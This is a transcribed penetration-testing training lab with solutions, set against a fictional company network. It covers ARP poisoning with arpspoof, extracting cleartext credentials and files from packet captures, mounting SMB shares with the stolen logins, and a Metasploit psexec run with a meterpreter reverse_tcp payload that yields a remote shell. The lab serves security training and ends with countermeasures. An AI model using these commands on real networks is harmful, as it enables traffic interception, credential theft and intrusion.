1. LAB SNIFFING LAB ID: 10

Size: px
Start display at page:

Download "1. LAB SNIFFING LAB ID: 10"

Transcription

1 H E R A LAB ID: 10 SNIFFING Sniffing in a switched network ARP Poisoning Analyzing a network traffic Extracting files from a network trace Stealing credentials Mapping/exploring network resources

2 1. LAB You are a Penetration Tester and you re asked to determine if a very sensitive network segment is secure. The client named Sportsfoo.com is a small research company specialized in Sports, so all data from a specific segment should only be available to the authorized users and should not be exposed to anybody else. The scope provided by the client is any host/device on the /24 network. The following image represents the LAB environment: Network x PENTESTER elearnsecurity s.r.l H E R A 2

3 2. GOALS Map the network Sniff the traffic Review the network traffic List your findings See what you can do with the credentials discovered Bonus: Provide a list of countermeasures to your client 3. WHAT YOU WILL LEARN How to map a network How to sniff in a switched network ARP Poisoning attack Review FTP and HTTP packets Obtain files transferred via SMB How to use the sensitive information obtained from the network trace in order to expand your access to the network To guide you during the lab you will find different Tasks. Tasks are meant for educational purposes and to show you the usage of different tools and different methods to achieve the same goal. They are not meant to be used as a methodology. elearnsecurity s.r.l H E R A 3

4 Armed with the skills acquired though the task you can achieve the Lab goal. If this is the first time you do this lab, we advise you to follow these Tasks. Once you have completed all the Tasks, you can proceed to the end of this paper and check the solutions. 4. RECOMMENDED TOOLS netdiscover nmap arpspoof driftnet Wireshark Metasploit / PSEXEC SMBmount 5. IMPORTANT NOTE Further information: Labs machines (like web server and internal organization machines) are not connected to the internet. In order to connect to the target organization website you have to insert the following line in your hosts file: elearnsecurity s.r.l H E R A 4

5 intranet.sportsfoo.com hosts path Windows: C:\Windows\System32\drivers\etc\hosts Linux: /etc/hosts elearnsecurity s.r.l H E R A 5

6 1. TASKS Task 1: Host Discovery Using ARP requests Using only ARP packets, please list all online hosts of the network /24. Mac Address Host IP address Please, list another way (another tool and its parameters) you could use to get the same information (still using only ARP packets): Task 2: Host Discovery Using DNS Task 2.1: Determine the DNS Server Perform a port scan in all of the hosts above in order to identify which one is running the DNS Service. Be very specific, so make sure you will only check for the DNS Port. Also, using the same command line, determine if the DNS Server is running Linux, BSD, or Windows. DNS Server IP Address elearnsecurity s.r.l H E R A 6

7 Task 2.2: Determine the domain name Using any DNS Lookup tool, please, determine for what domain name this DNS Server is authoritative. Domain Name Task 2.3: List additional hosts using DNS zone transfer Once you know the domain name and the DNS Server address, please, check if you are able to identify new hosts using a DNS zone transfer. New Hosts Can you tell why the hosts above were not found using ARP requests? Task 3: Identify the default gateway for the /24 network According to all tasks above, you have been able to identify two different networks. Now we need to identify the default gateway who is handling the communication between these networks. How can you do that? elearnsecurity s.r.l H E R A 7

8 Task 4: Draw a network map Let s draw a network map in order to graphic represent the environment that we have discovered so far. Task 5: Sniff packets between the hosts and Sniff all packets sent/received between the hosts and Keep yourself sniffing this target for 5 minutes. Save the network trace as /root/task5.pcap. Make sure you are able to see all images while you are sniffing. Task 6: Sniff packets between the hosts and Sniff all packets sent/received between the hosts and Keep yourself sniffing this target for 5 minutes. Save the network trace as /root/task6.pcap. Task 7: Sniff packets between the hosts and Sniff all packets sent/received between the hosts and Keep yourself sniffing this target for 5 minutes. Save the network trace as /root/task7.pcap. Task 8: Analyze the file /root/task5.pcap Task 8.1: Understand the big picture of the network traffic elearnsecurity s.r.l H E R A 8

9 Before diving into every single packet of the network trace, first try to a big picture of what was obtained. Identify the most used protocols. HTTP Percentage: FTP Percentage: Task 8.2: Analyze the HTTP traffic Part 1 Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure your filter don t show any packet originated or destined to your (attacker) machine. The HTTP protocol consists of a couple of different commands (full details are available on the RFC 2616). Task 8.3: Analyze the HTTP traffic Part 2 Remember that we were hired to determine if that network segment is secure, so analyze all of the packets and determine which ones are secure. Task 8.4: Analyze the HTTP traffic Part 3 Find at least 2 HTTP requests which are not secure, but they don t seem to contain confidential information. Task 8.5: Analyze the HTTP traffic Part 4 Find at least 2 HTTP requests that are really insecure and expose your client to big problems like identity theft, privilege escalation, etc. elearnsecurity s.r.l H E R A 9

10 Task 8.6: Analyze the FTP traffic Part 1 Create a filter in Wireshark to show only the FTP traffic. Task 8.7: Analyze the FTP traffic Part 2 List the ftp commands issued by the host Task 8.8: Analyze the FTP traffic Part 2 What is the username and password used during that FTP connection? Task 9: Analyze the file /root/task6.pcap Task 9.1: Determine the username and password in use for the website Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host when accessing the Username Password Task 9.2: Recovery all of the files downloaded by the user above By reviewing all of the HTTP GET requests, describe all of the files that were retrieved by the user above. elearnsecurity s.r.l H E R A 10

11 Task 10: Analyze the file /root/task7.pcap Review the network trace obtained via task 7. Identify two files which were transferred via SMB and its contents. Filename Contents Task 11: Use the credentials gathered in order to see what access you can get on the host With two different credentials in handy, check if you can access the following resources: \\ \finance Credential: \\ \technology Credential: Remote shell on the Credential: Task 12: Countermeasures List at least one countermeasure that your client could implement for some of the problems identified during the test. 1. What protocol can be used on the in order to avoid that credentials are transmitted in clear-text? elearnsecurity s.r.l H E R A 11

12 2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com? 3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN are encrypted? 4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks? elearnsecurity s.r.l H E R A 12

13 Solutions elearnsecurity s.r.l H E R A 13

14 Task 1: Host Discovery Using ARP requests SNIFFING LAB ID: 10 Answer: netdiscover i tap0 r /24 Explanation: The netdiscover command works by sending ARP requests to the broadcast address asking for specific IP address range (if specified). ARP (Address Resolution Protocol) is a protocol used for resolution of network layer addresses (IP address) into link layer addresses (MAC address). ARP works on the layer 2 of the OSI model, so it can only be used to discovery hosts which are located in the same subnet. As you can see on the screenshot below, many ARP packets were sent to the Broadcast address (ff:ff:ff:ff:ff:ff), however, ARP replies were only obtained from the hosts which are live: , , , and Mac Address Host IP address 00:50:56:b1:04:bc :50:56:b1:05:b :50:56:b1:05:b elearnsecurity s.r.l H E R A 14

15 00:50:56:b1:05:ba Please, list another way (another tool and its parameters) you could use to do host discovery using only ARP requests: Answer: nmap PR sn Task 2: Host Discovery Using DNS Task 2.1: Determine the DNS Server Answer: nmap st v p Explanation: As we already have a list of hosts found, now, we need to query each one of these hosts in order to identify who is running the DNS service. DNS port is TCP/53 (for zone transfer) and UDP/53 (for DNS queries), all we need to do is to check if the TCP port 53 is open in all of the hosts that we know are online. The command above is issued above tells nmap to use a TCP connect scan (-st) to the port 53 (-p53) to the hosts , , , and As shown in the screenshot below, NMAP sent four SYN packets, targeting the port 53 of all of these hosts. According to the TCP 3-way handshake, the hosts which are listening to that port should answer with a SYN,ACK packet. The hosts which don t have the port 53 open should answer with a RST,ACK packet. As we can see on the screenshot, the only host which replied with a SYN,ACK packet is the , while the host replied with a RST,ACK packet which means that port is closed. The hosts and have not responded with any elearnsecurity s.r.l H E R A 15

16 packet which means that likely a firewall is in place (or another packet filtering mechanism). DNS Server IP Address Task 2.2: Determine the domain name Answer: sportsfoo.com Explanation: Once we already know a couple of hosts of our client and also who is the DNS Server for that network, our next step is to identify the network domain name. We can do that by using reverse lookups with nslookup or dig. nslookup (here we are launching the nslookup utility) > server (here we are telling the tool to use a specific DNS server. By default nslookup uses the DNS servers specified on the file /etc/resolv.conf) Default server: Address: #53 > elearnsecurity s.r.l H E R A 16

17 (here we are asking the DNS server to tell us what is the FQDN - fully qualified domain name - for the host We could use any known IP address). Server: Address: # in-addr.arpa name = wkst-techsupport.sportsfoo.com. You could also use dig for the task above. The following command line would do all of the work above: x Task 2.3: List additional hosts using DNS zone transfer Answer: sportsfoo.com -t AXFR Explanation: Zone transfers are, usually, misconfigurations of a DNS server. They should be enabled, if required, only for trusted IP addresses (usually trusted downstream name servers). When zone transfers are open to anyone, we can enumerate the whole DNS record for that zone. There are a couple of different tools that are able to do that, however, we will focus on dig. The command sportsfoo.com t AXFR asks the DNS Server to list all of their records (full zone transfer t AXFR) for the domain named: sportsfoo.com. The full command and its results are listed below. Note that we were able to discovery two new hosts: and sportsfoo.com -t AXFR ; <<>> DiG P1 sportsfoo.com -t AXFR ; (1 server found) ;; global options: +cmd elearnsecurity s.r.l H E R A 17

18 sportsfoo.com IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com sportsfoo.com IN NS els-winser2003.sportsfoo.com. sportsfoo.com IN NS els-winser2003.sports.com. els-winser2003.sportsfoo.com IN A ftp.sportsfoo.com IN A intranet.sportsfoo.com IN A wkst-finance.sportsfoo.com IN A wkst-techsupport.sportsfoo.com IN A sportsfoo.com IN SOA els-winser2003.sportsfoo.com. hostmaster.sportsfoo.com ;; Query time: 411 msec ;; SERVER: #53( ) ;; WHEN: Sun Nov 18 03:19: ;; XFR size: 9 records (messages 9, bytes 609) The new hosts found belong to a different network ( x). As the penetration tester laptop is placed in the network /24 and all of the host discovered performed so far were only done using ARP packets, we then understand that we were unable to find these hosts before because ARP packets can only sent to machines in the same broadcast domain, so ARP discovery only works for hosts in the same subnet. elearnsecurity s.r.l H E R A 18

19 Task 3: Identify the default gateway for the /24 network Answer: The default gateway is Explanation: One of the methods that could be used to identify the default gateway of a network is to track the packets taken from an IP network on their way to a given host. The command traceroute does exactly that, however, in this case looks like the default gateway is blocking ICMP packets, so traceroute is not going to help here. Another way to try to identify the default gateway is to evaluating the already existing routes in your system. You can do that by running the route command. As you can see below, always that the penetration tester needs to communicate with the network , it s going to use the gateway Note: In order to be able to sniff packets properly using arpspoof, you will need to use the same default gateway that the one which is in use by your target. elearnsecurity s.r.l H E R A 19

20 Task 4: Draw a network map This is a possible graphic representation after compiling all information gathered so far: wkst-techsupport.sportsfoo.com wkst-finance.sportsfoo.com Default Gateway Network Network x PENTESTER els-winser2003.sportsfoo.com DNS Server ftp.sportsfoo.com intranet.sportsfoo.com Task 5: Sniff packets between the hosts and In order to sniff all packets between the hosts and we can follow the instructions below: 1-) Prepare to collect all of the network traffic sent to/from your target: 1.1-) Launch Wireshark (If you are using Backtrack, click Applications, Forensics, Network Forensics, Wireshark). 1.2-) Select the network interface that you intend to grab network traffic (Click Capture, Interfaces, check tap0, and then click Start). 2-) Enable IP forward in your system. To do this, run the following command: echo 1 > /proc/sys/net/ipv4/ip_forward elearnsecurity s.r.l H E R A 20

21 3-) Now we will need to trick our targets. We will need to tell to the IP address that every time that it needs to communicate to the IP address , it should forward the request to the PENTESTER system and vice-versa. It can be done by the following commands (we will need two different terminal windows to run these commands): arpspoof i tap0 t arpspoof i tap0 t The commands above will keep sending ARP packets in order to trick the ARP table of both hosts. It will set the ARP table in a malicious way so always that the host needs to communicate to the , instead of going to the MAC Address of the host , it will go to the MAC address of our system (penetration tester). In order to illustrate this attack, consider the following ARP table cache displayed on the system before launching the attack: elearnsecurity s.r.l H E R A 21

22 Now, see the same ARP cache table after launching our attack: elearnsecurity s.r.l H E R A 22

23 4-) Launch driftnet in order to see if are any images on the traffic between these hosts, so you can might have a clue about what they are doing. To do that, run the following command: driftnet i tap0 You might be able to see some images like: 5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task5.pcap so we can review it later. elearnsecurity s.r.l H E R A 23

24 Task 6: Sniff packets between the hosts and We will need to repeat the same technique used in Task 5, so let s summarize what we will need to do: 1-) Start Wireshark and start a new capture by selecting the proper network interface tap0. 2-) Check if IP Forward is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If its 1, it means that it s already enabled. If its disabled, make sure that you enable it by running the command: echo 1 > /proc/sys/net/ipv4/ip_forward 3-) Now we will need to trick our targets by changing their ARP cache table. For that, we will need to open two different terminal windows and run the following commands: arpspoof i tap0 t arpspoof i tap0 t ) Launch driftnet in order to see if so you can have an understanding about what is happening between these hosts. To do that, run the following command: driftnet i tap0 You might be able to see some images like: elearnsecurity s.r.l H E R A 24

25 5-) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task6.pcap so we can review it later. Task 7: Sniff packets between the hosts and We will need to repeat the same techniques used in Task 5 and 6, so: 1-) Start Wireshark and start a new capture by selecting the network interface tap0. 2-) Check if IP Forward is already enabled in your system by running the command cat /proc/sys/net/ipv4/ip_forward. The default value is 0. If its 1, it means that it s already enabled. So if its disabled, make sure that you enable it by running the command: elearnsecurity s.r.l H E R A 25

26 echo 1 > /proc/sys/net/ipv4/ip_forward 3-) Now we will need to trick our targets by changing their ARP cache table. For that, we will need to open two different terminal windows and run the following commands: arpspoof i tap0 t arpspoof i tap0 t ) Wait 5 minutes or so and then stop the network capture in Wireshark. Also interrupt (control + c) or close the arpspoof commands that might be still running. Save the network capture as /root/task7.pcap so we can review it later. Task 8: Analyze the file /root/task5.pcap Task 8.1: Understand the big picture of the network traffic gathered Before diving into every packet of the network trace, first try to understand the type of traffic that was obtained. We can do that by opening the file /root/task5.pcap in Wireshark and then Statistics, Protocol Hierarchy. elearnsecurity s.r.l H E R A 26

27 According to the screenshot above, we can see that from all traffic obtained, we got 2,02% of FTP traffic, 4,19% of HTTP traffic, and then 5,63% of SSL traffic. Task 8.2: Analyze the HTTP traffic Part 1 Create a filter in Wireshark so you can see only the HTTP traffic. Also make sure that you only see the network traffic sent and received by your target ( ). You can do that by inserting the following string on the filter field as highlighted below: http and ip.addr == Task 8.3: Analyze the HTTP traffic Part 2 After analyzing the HTTP traffic we were able to understand that it s a protocol which consists of a bunch of requests and responses basically. Also all traffic transmitted in HTTP is also transmitted in clear-text. elearnsecurity s.r.l H E R A 27

28 SSL is the protocol which implements security for the HTTP protocol. When you use SSL, all of your strings are not transmitted in clear-text, so even if someone is able to capture your traffic, it will be a hard time to try to decrypt it in order to understand what s going on. So, in order to determine which packets sent/received by the host are secure, all we need to do is to create a filter for SSL packets: Task 8.4: Analyze the HTTP traffic Part 3 One of the main commands used on the HTTP protocol is the HTTP GET request. HTTP GET requests are usually used when you want to retrieve a file from a webserver. In the screenshot below, we could see that the user has browsed to the file casillas.png on the website. You can see the HTTP GET request (in red) and also the HTTP Response from the server (in blue): elearnsecurity s.r.l H E R A 28

29 So while the information is being transmitted in clear-text on the network, likely the only fact that the user is browsing to that website and downloading a couple of files is not a big deal. We can see other HTTP GET requests issued by the user by creating the following filter in Wireshark: http.request.method == GET elearnsecurity s.r.l H E R A 29

30 Task 8.5: Analyze the HTTP traffic Part 4 The HTTP POST request is usually used when an user wants to submit an information to the webserver (like filling a form). So its definitively something that we want to check in order to see if critical information is being transmitted in clear-text. We can do that by creating the following filter in Wireshark: http.request.method == POST As you can see on the screenshot below, there are a couple of POST requests with a very interesting name: POST /checklogin.php. Let s take a look closer to one of these requests by selecting one of these packets, right click on it, and then select Follow TCP Stream: elearnsecurity s.r.l H E R A 30

31 According to the screenshot above, we are able to see an attempt to login on the website by submitting the username gfreitas and the password However, looks like it failed, because the server answered with a HTTP 302 code which is redirecting the user to a page named notheremyfriend.php. Even if this credential is not valid for this website, an attacker might want to use that credential when attacking other resources. On the same screen (Follow TCP Stream), click in the button named Filter out This Stream, so Wireshark will exclude temporary this request from the remaining packets, so you can continue your analysis. You will have to repeat the procedure above until you find a valid credential. According to the example below we were able to obtain a valid credential. While the password used by the user admin is a strong one, it doesn t helps since it is being transmitted in clear-text. Note: You can try to validate this credential by trying to login on the website. elearnsecurity s.r.l H E R A 31

32 Task 8.6: Analyze the FTP traffic Part 1 Create a filter in Wireshark to show only the FTP traffic. It s pretty simple by just typing ftp on the Filter field and hitting <Enter> or by clicking on the Apply button. Task 8.7: Analyze the FTP traffic Part 2 List the ftp commands issued by the host We can do that by selecting the first packet, right click on it, and select Follow TCP Stream: All of the commands issued by the user are in red and all of the server responses are in blue. elearnsecurity s.r.l H E R A 32

33 Task 8.8: Analyze the FTP traffic Part 2 What is the username and password used during that FTP connection? According to the screenshot above, the username is admin and the password is Task 9: Analyze the file /root/task6.pcap Task 9.1: Determine what the username and password in use for the website Analyze all of the HTTP POST requests and determine what is the correct username and password in use by the host when accessing the According to the second screenshot of the Task 8.7, we already got an understanding that when an user is able to login successfully it will get a HTTP 302 response which will redirect the user to the page named login_success.php. If the authentication fails, it will also get a HTTP 302 response, however, the user will be redirected to the page named notheremyfriend.php. With that in mind, instead of going through every single HTTP we can just create and apply a filter that will just show all of the packets of our interest: http.location == login_success.php elearnsecurity s.r.l H E R A 33

34 Then, right click in any of these packets and select Follow TCP Stream: According to the screenshot below, we were able to identify one more working credentials: Username almir Password Corinthians2012 Task 9.2: Recovery all of the files downloaded by the user above Use the following steps in order to recovery (retrieve) all of the files downloaded by the user: 1-) Launch Wireshark and then open the following file: /root/task6.pcap 2-) Click File, Open, Export Objects, HTTP elearnsecurity s.r.l H E R A 34

35 Select one or more files and save to a folder of your preference. elearnsecurity s.r.l H E R A 35

36 According to the screenshot below we were able to retrieve the files successfully: Task 10: Analyze the file /root/task7.pcap Review the network trace obtained in task 7. Identify two files which were transferred via SMB and its contents. 1-) Launch Wireshark and open the file /root/task7.pcap 2-) Click Statistics, Protocol Hierarchy in order to get an understanding of the type of traffic that we will need to deal with. elearnsecurity s.r.l H E R A 36

37 3-) According to the screenshot above, looks like there was a significant amount of traffic being transmitted via SMB. So let s create a filter in Wireshark so we can only see traffic related to this protocol. We just need to type smb on the filter field and then click Apply: 4-) We can have a clue if there were any file transmitted via SMB by creating a filter with the following string: smb.file: 5-) According to the screenshot above, looks like there are some interesting files being transmitted via SMB. We can try to retrieve those files using the following steps: 5.1-) Click File, Export Objects, SMB. 5.2-) You should see a list of files that were transmitted via SMB. Note that looks like we have two different files. The first one has 374 bytes and the other has 662 bytes. According to the screenshot above, probably one of the files is the performance.doc and the other one is the salaries.doc. elearnsecurity s.r.l H E R A 37

38 5.3-) Save all files to a folder of your preference and give the.doc extension to them. Then open the files in order to see their content: elearnsecurity s.r.l H E R A 38

39 Task 11: Use the credentials gathered in order to see what access you can get on the host With two different credentials in handy, check if you can access the following resources: 1-) \\ \finance 2-) \\ \technology 3-) Remote shell on the According to the tasks 8.5 and 8.7, we have discovered the following credential: Username admin Password According to the task 9.1, we have discovered the credential below: Username almir Password Corinthians2012 Now, all we need to do is to test the credentials above in order to see which one can access the resources above Testing access to the UNC share: \\ \finance 1-) We can use the command smbmount in order to mount a UNC share in our Linux system. To do this we will need to type: Smbmount // /finance /tmp/finance o username=almir,password=corinthians2012,rw elearnsecurity s.r.l H E R A 39

40 11.2 Testing access to the UNC share: \\ \technology 1-) We can use the command smbmount in order to mount a UNC share in our Linux system. To do this we will need to type: Smbmount // /technology /tmp/technology o elearnsecurity s.r.l H E R A 40

41 11.3 Testing if you are able to get a remote shell on the ) Once we have two valid credentials we might want to try to get a remote shell by using the PSEXEC exploit. In order to do that, open the Metasploit Console (msfconsole) and prepare an exploit according to the parameters below: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBUser admin SMBUser => admin msf exploit(psexec) > set SMBPass SMBPass => msf exploit(psexec) > set RHOST RHOST => msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST (Pentester IP address) LHOST => msf exploit(psexec) > exploit 2-) Once you run the exploit above, you will see that you will be able to get a remote shell on the host successfully, since the credential used (admin) is also a local administrator account for that particular host: elearnsecurity s.r.l H E R A 41

42 [*] Started reverse handler on :4444 [*] Connecting to the server... [*] Authenticating to :445 WORKGROUP as user 'admin'... [*] Uploading payload... [*] Created \gntqvmkk.exe... [*] Binding to [*] Bound to [*] Obtaining a service manager handle... [*] Creating a new service (ZdlTfEpQ - "MSTOPiQJKeoqes")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Sending stage ( bytes) to [*] Closing service handle... [*] Deleting \gntqvmkk.exe... [*] Meterpreter session 1 opened ( :4444 -> :1594) at :55: meterpreter > shell Process 3716 created. Channel 1 created. Microsoft Windows [Version ] (C) Copyright Microsoft Corp. C:\WINDOWS\system32>hostname hostname els-winser2003 C:\WINDOWS\system32> Task 12: Countermeasures List at least one countermeasure that your client could implement for some of the issues identified during the test: 1. What protocol can be used on the website in order to avoid that credentials are transmitted in clear-text? elearnsecurity s.r.l H E R A 42

43 Answer: SSL 2. What protocol or tool can be used as a replacement for the FTP service in use on the host ftp.sportsfoo.com? Answer: SFTP 3. What protocol can be used to ensure that all traffic between the file server and any other host on the LAN are encrypted? Answer: IPSEC 4. What countermeasure can be implemented in order to protect the network against ARP poisoning attacks? Answer: You can use static ARP entries elearnsecurity s.r.l H E R A 43

Session Hijacking Exploiting TCP, UDP and HTTP Sessions

Session Hijacking Exploiting TCP, UDP and HTTP Sessions Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor shray.kapoor@gmail.com Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being

More information

Introduction to Network Security Lab 1 - Wireshark

Introduction to Network Security Lab 1 - Wireshark Introduction to Network Security Lab 1 - Wireshark Bridges To Computing 1 Introduction: In our last lecture we discussed the Internet the World Wide Web and the Protocols that are used to facilitate communication

More information

LAB THREE STATIC ROUTING

LAB THREE STATIC ROUTING LAB THREE STATIC ROUTING In this lab you will work with four different network topologies. The topology for Parts 1-4 is shown in Figure 3.1. These parts address router configuration on Linux PCs and a

More information

Vulnerability Assessment and Penetration Testing

Vulnerability Assessment and Penetration Testing Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration

More information

BASIC ANALYSIS OF TCP/IP NETWORKS

BASIC ANALYSIS OF TCP/IP NETWORKS BASIC ANALYSIS OF TCP/IP NETWORKS INTRODUCTION Communication analysis provides powerful tool for maintenance, performance monitoring, attack detection, and problems fixing in computer networks. Today networks

More information

Setting Up Scan to SMB on TaskALFA series MFP s.

Setting Up Scan to SMB on TaskALFA series MFP s. Setting Up Scan to SMB on TaskALFA series MFP s. There are three steps necessary to set up a new Scan to SMB function button on the TaskALFA series color MFP. 1. A folder must be created on the PC and

More information

Network Traffic Analysis

Network Traffic Analysis 2013 Network Traffic Analysis Gerben Kleijn and Terence Nicholls 6/21/2013 Contents Introduction... 3 Lab 1 - Installing the Operating System (OS)... 3 Lab 2 Working with TCPDump... 4 Lab 3 - Installing

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or

More information

Local DNS Attack Lab. 1 Lab Overview. 2 Lab Environment. SEED Labs Local DNS Attack Lab 1

Local DNS Attack Lab. 1 Lab Overview. 2 Lab Environment. SEED Labs Local DNS Attack Lab 1 SEED Labs Local DNS Attack Lab 1 Local DNS Attack Lab Copyright c 2006 Wenliang Du, Syracuse University. The development of this document was partially funded by the National Science Foundation s Course,

More information

During your session you will have access to the following lab configuration. CLIENT1 (Windows XP Workstation) 192.168.0.2 /24

During your session you will have access to the following lab configuration. CLIENT1 (Windows XP Workstation) 192.168.0.2 /24 Introduction The Network Vulnerabilities module provides you with the instruction and Server hardware to develop your hands on skills in the defined topics. This module includes the following exercises:

More information

Guideline for setting up a functional VPN

Guideline for setting up a functional VPN Guideline for setting up a functional VPN Why do I want a VPN? VPN by definition creates a private, trusted network across an untrusted medium. It allows you to connect offices and people from around the

More information

Attack Lab: Attacks on TCP/IP Protocols

Attack Lab: Attacks on TCP/IP Protocols Laboratory for Computer Security Education 1 Attack Lab: Attacks on TCP/IP Protocols Copyright c 2006-2010 Wenliang Du, Syracuse University. The development of this document is funded by the National Science

More information

- Basic Router Security -

- Basic Router Security - 1 Enable Passwords - Basic Router Security - The enable password protects a router s Privileged mode. This password can be set or changed from Global Configuration mode: Router(config)# enable password

More information

Metasploit Unleashed. Class 2: Information Gathering and Vulnerability Scanning. Georgia Weidman Director of Cyberwarface, Reverse Space

Metasploit Unleashed. Class 2: Information Gathering and Vulnerability Scanning. Georgia Weidman Director of Cyberwarface, Reverse Space Metasploit Unleashed Class 2: Information Gathering and Vulnerability Scanning Georgia Weidman Director of Cyberwarface, Reverse Space Information Gathering Learning as much as possible about targets Ex:

More information

Learn Ethical Hacking, Become a Pentester

Learn Ethical Hacking, Become a Pentester Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,

More information

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network

More information

Network Forensics Network Traffic Analysis

Network Forensics Network Traffic Analysis Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative

More information

Linux Network Security

Linux Network Security Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols

More information

Modern snoop lab lite version

Modern snoop lab lite version Modern snoop lab lite version Lab assignment in Computer Networking OpenIPLab Department of Information Technology, Uppsala University Overview This is a lab constructed as part of the OpenIPLab project.

More information

Security of IPv6 and DNSSEC for penetration testers

Security of IPv6 and DNSSEC for penetration testers Security of IPv6 and DNSSEC for penetration testers Vesselin Hadjitodorov Master education System and Network Engineering June 30, 2011 Agenda Introduction DNSSEC security IPv6 security Conclusion Questions

More information

My FreeScan Vulnerabilities Report

My FreeScan Vulnerabilities Report Page 1 of 6 My FreeScan Vulnerabilities Report Print Help For 66.40.6.179 on Feb 07, 008 Thank you for trying FreeScan. Below you'll find the complete results of your scan, including whether or not the

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

Lab 2. CS-335a. Fall 2012 Computer Science Department. Manolis Surligas surligas@csd.uoc.gr

Lab 2. CS-335a. Fall 2012 Computer Science Department. Manolis Surligas surligas@csd.uoc.gr Lab 2 CS-335a Fall 2012 Computer Science Department Manolis Surligas surligas@csd.uoc.gr 1 Summary At this lab we will cover: Basics of Transport Layer (TCP, UDP) Broadcast ARP DNS More Wireshark filters

More information

DNS Resolving using nslookup

DNS Resolving using nslookup DNS Resolving using nslookup Oliver Hohlfeld & Andre Schröder January 8, 2007 Abstract This report belongs to a talk given at the networking course (Institue Eurecom, France) in January 2007. It is based

More information

Lab 1: Packet Sniffing and Wireshark

Lab 1: Packet Sniffing and Wireshark Introduction CSC 5991 Cyber Security Practice Lab 1: Packet Sniffing and Wireshark The first part of the lab introduces packet sniffer, Wireshark. Wireshark is a free opensource network protocol analyzer.

More information

Packet filtering with Iptables

Packet filtering with Iptables CSC-NETLAB Packet filtering with Iptables Group Nr Name1 Name2 Name3 Date Instructor s Signature Table of Contents 1 Goals...2 2 Introduction...3 3 Getting started...3 4 Connecting to the virtual hosts...3

More information

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests

More information

Internet Security [1] VU 184.216. Engin Kirda engin@infosys.tuwien.ac.at

Internet Security [1] VU 184.216. Engin Kirda engin@infosys.tuwien.ac.at Internet Security [1] VU 184.216 Engin Kirda engin@infosys.tuwien.ac.at Christopher Kruegel chris@auto.tuwien.ac.at Administration Challenge 2 deadline is tomorrow 177 correct solutions Challenge 4 will

More information

Chapter 8 Router and Network Management

Chapter 8 Router and Network Management Chapter 8 Router and Network Management This chapter describes how to use the network management features of your ProSafe Dual WAN Gigabit Firewall with SSL & IPsec VPN. These features can be found by

More information

ShadowControl ShadowStream

ShadowControl ShadowStream ShadowControl ShadowStream Revision 1.3 4/12/2012 Table of Contents Introduction... 3 Download ShadowStream Server... 3 Installation... 4 Configuration... 5 Creating Users... 6 Testing the User Rights...

More information

Using IPM to Measure Network Performance

Using IPM to Measure Network Performance CHAPTER 3 Using IPM to Measure Network Performance This chapter provides details on using IPM to measure latency, jitter, availability, packet loss, and errors. It includes the following sections: Measuring

More information

Information Security. Training

Information Security. Training Information Security Training Importance of Information Security Training There is only one way to keep your product plans safe and that is by having a trained, aware and a conscientious workforce. - Kevin

More information

Attack Lab: Attacks on TCP/IP Protocols

Attack Lab: Attacks on TCP/IP Protocols Laboratory for Computer Security Education 1 Attack Lab: Attacks on TCP/IP Protocols Copyright c 2006-2009 Wenliang Du, Syracuse University. The development of this document is funded by the National Science

More information

How-to: DNS Enumeration

How-to: DNS Enumeration 25-04-2010 Author: Mohd Izhar Ali Email: johncrackernet@yahoo.com Website: http://johncrackernet.blogspot.com Table of Contents How-to: DNS Enumeration 1: Introduction... 3 2: DNS Enumeration... 4 3: How-to-DNS

More information

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder. CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files

More information

